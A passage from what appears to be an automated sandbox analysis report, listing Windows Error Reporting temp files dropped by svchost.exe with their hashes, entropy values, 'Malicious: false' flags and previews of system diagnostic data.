Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B3E.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	79432
Entropy (8bit):	3.0786522270922423
Encrypted:	false
SSDEEP:	768:iQNsBOZBptwXB+vPff4BIhLPiGS+zHMCNVnnBAxgaq9L+j/mVC:kOZBp4GPfc8uGS+LMWVnygx58/h
MD5:	6E57FEE1F4C43891568AC778030FF664
SHA1:	7F04EB065616D04BF95E9ACFDC5A5A237E65C294
SHA-256:	3ADCBE58BAFBFB7329C9E6A15FA43D34139AA376DC85CFDEE467C05457753EF8
SHA-512:	1213A354536F94EC03CCC86CCA0B36029B636B1E40B18F353C04DABE27C08E3A2F9ACD7301B3BA3AF9453BDCD2004B0FA664EE075473072996AD4EEBAEDBFC25
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3C1A.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.689603646610911
Encrypted:	false
SSDEEP:	96:TiZYWtWgNbxYpYKWuHaUYEZHltDiU35lnSRw8eV+Xab7VMCNUIUf3:2ZDtxuLOFXab7VMCNDUf3
MD5:	F32D8CDD8CA7DB58752CC99E1382B22D
SHA1:	29857A26F5B8685A74010946AC70BF252266992E
SHA-256:	557C7A8A59554C15B15BBCB180DD05648928BF62D295E1CF10A327537755808E
SHA-512:	AF32B7A92F802D01A5EE8B972C88EED1993131C41C6D08B546EF7336F5E3D876B4B320A0650CE3E732AFBCD24C8B1FC4D72D5573989C3484EA07002B898565E3
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F09.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	79432
Entropy (8bit):	3.0785486457160847
Encrypted:	false
SSDEEP:	768:qIacZPZBptwXB+vPff4u+IhHPiGS+2LXCNVnnBAxgoau+G2I:NPZBp4GPfj+8aGS+MXWVnygIJ2I
MD5:	815504833A699DCEAAB109E67D875F1F
SHA1:	C2CD4E9478CFD43872E1013F12FE4A93B8542E33
SHA-256:	F069CCEFFF202E5265BF04763DF9F567335496D8A58C2265506EB9B083AAFE9E
SHA-512:	4D90A8C48D12265EA1DF6E248C38D8EDF9270B9F6E4024A86F698FE5E7440920E1D9A56C4755B5C9645F18D6283D49E2D0D218757B44AA7AC3CE6FFAC4F2A3ED
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3F77.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6901274650468374
Encrypted:	false
SSDEEP:	96:TiZYWtbI8YfYBDY2nWAaHaUYEZ00tDi83IlnSRwDWnX0ad7MMeNlIjf3:2ZDtqGDPT1RWkad7MMeN6jf3
MD5:	08AC29B10A430D152111715E94C86DEC
SHA1:	3AE7A6574AAA7BC57922930DFB25E01046C04D4C
SHA-256:	9D6957516E71961665FBF96EDFAF21CCC089B3D092193AE6F3EDC6177EBE51BF
SHA-512:	B40F1154997DE60676A039454F5A1B67FE304FF2DA5C3B494D0B837EF536F60277C72C32D31664760223FB8C3760787907A064F1C7580ADC75BD6F1724834026
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER59E4.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83232
Entropy (8bit):	3.0752398713226636
Encrypted:	false
SSDEEP:	1536:zeptS3PzauxI/RwbP66AxctffWVnygBpMg:zeptS3PzauxI/RwbP66AxctffWVnygBP
MD5:	ACBEAF9F22DE71376D1D2F8806925D15
SHA1:	8DB12B5E8884FF4A6A5567B603F40260364C21BE
SHA-256:	B78D8199324D8B9725DA0AB0613BF53A92062F525579FEB44B6B53972D8563EB
SHA-512:	DB54D9D155AC20C10C3C4F4CE02720AC753216C54EEE8590605D3FF08DD0175238FBBF0505328F0A498C6AA814592A8CE7EAB0A29CAEEF5F55C0E23A1AAB8A8E
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5AA0.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.685994668536122
Encrypted:	false
SSDEEP:	96:TiZYWvbP/Xt8NYhYqW2HcUYEZp9tDisIj0Szwf+ycUWL2aJX75XMYFbrIm83:2ZDvS2vD+VL2aJXlXMYhkm83
MD5:	7F11AB033CC996DE028480BFC095EBFB
SHA1:	DAE9E034633C81A83FFE761248765A19F0666227
SHA-256:	11FD4FBFA3D0EE25F91FD04A9EBFBD64097F8056AC6256060774416B01B8585E
SHA-512:	D8281CF528EFDCB8E77FBD66177672FC1732AD105A6886A13DD6176F96000D5B9074243BFB4A37973C88851ECF8DF6785C4FA1508DB460098CC989C7BA99AB9E
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5C57.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83242
Entropy (8bit):	3.0750333362148683
Encrypted:	false
SSDEEP:	1536:Edyte3PzvuxwNRwNPD6PNgsffWVnygCiv:Edyte3PzvuxwNRwNPD6PNgsffWVnygCQ
MD5:	F7183F0A972DAB1A1378F9C146767C96
SHA1:	66898BE33B325D64C75F67DF563B119B7DB2F495
SHA-256:	DDC2CF5F32285D7C94D453547197B2C0F5D1307B5CE8F4E3DE17A6F1FA1C3229
SHA-512:	92BC71564C63434F1E0A772E1C9819F00A183E46F02ECC576C045CAFFAD8CD3732E5B7FF4AC459530B9F4530268CA4AE54DCD8F01EB1532E56C5762EA1503C72
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5CF4.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.6867775338078688
Encrypted:	false
SSDEEP:	96:TiZYW+n5abM2YgYEWN+HKUYEZ2XtDi7I30SSw9zRjaXXxgMlZQIY83:2ZD+4XeFpaXXxgMlZnY83
MD5:	CDFD5A661AC947727661F9C941BDA375
SHA1:	7C0FF691EFB1B27550E0ADFF9E8D44DB04DA91D6
SHA-256:	E19F615BCF20F9AB922B30828C7977A77C22703C3BAD7186C6D9880318135875
SHA-512:	E5E44E19618F668164E70FAE5FBD218F0A10A676515E301724BE5DB000099D3922C3FBBC6D17EFF901EA82B882C04C672EBD4CB9F9E7EAEBFBB5517217612D87
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5E9B.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83244
Entropy (8bit):	3.074926165613852
Encrypted:	false
SSDEEP:	768:iLKmgtDuk3Pab9UWuia2pKqkRod1g5B6joF5sffCNVnnBAxg75HqngX:igtf3Pa5uxuURw1gv6joDsffWVnygdc4
MD5:	9847569DC3529C9228EA139D8E9A1311
SHA1:	987E01D4080A5D392892C884242BFC28276C0227
SHA-256:	3162E3862680DB1FEEC90BE0D7175A52D506130E22362FB264D1008376CF9B17
SHA-512:	5721BB46466E1DCD53E6F3CA5DD830DA08FEA405BA666FB35261AAF49227D6E1144748A766D03097032C15953443ACE8BAD345467357584DA69A233036102D7E
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F29.tmp.txt

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	13340
Entropy (8bit):	2.686259009393176
Encrypted:	false
SSDEEP:	96:TiZYWfYarVYYAtY2WvL7UMH0UYEZNotDidIX0SOwJ/larX11MGZzIH83:2ZDfEFQLhWNarX11MGZ8H83
MD5:	0A5C9104B025206C1B2D00E0493C1EE3
SHA1:	4E23DDCB6DC8AC3F4B42C83E5FDC7F0B55117232
SHA-256:	AE5FCDB9799B5E6068164C6382F1FAEC359A9D4D7B5730FBFE1252C460578769
SHA-512:	F409A15937A2FA7BC352163FD498A2F0D14066E1EE9079D96E65F48841359510E71E435C9849BCDECB3737EE9E50430A4E571FE94A145B867BE8BC599961D576
Malicious:	false
Preview:	B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.3.3.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .

C:\ProgramData\Microsoft\Windows\WER\Temp\WER665D.tmp.csv

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	83622
Entropy (8bit):	3.0744500693228196
Encrypted:	false
SSDEEP:	1536:AptBIjwNfFuxGRwsbS6+dhwffWVnygaSkT:AptBIjwNfFuxGRwsbS6+dhwffWVnyga1
MD5:	DA275B424B47DDDC079D81AFB7AE1503
SHA1:	F3B769AFB39CB1746A435AA5E5D8955E05160DA8
SHA-256:	01C5D04C17B13E2109B096103716F790F2DCD781F5C1E778BA76CD0AD57EBF83
SHA-512:	2DA381556C7C434775702487AB32066932D895B74BFD37FDA1D752E08A3834B72EFC401B7B9EBC20216645F99E6E38E07AAF2164D7A37822CC768CEFB64827A3
Malicious:	false
Preview:	I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.

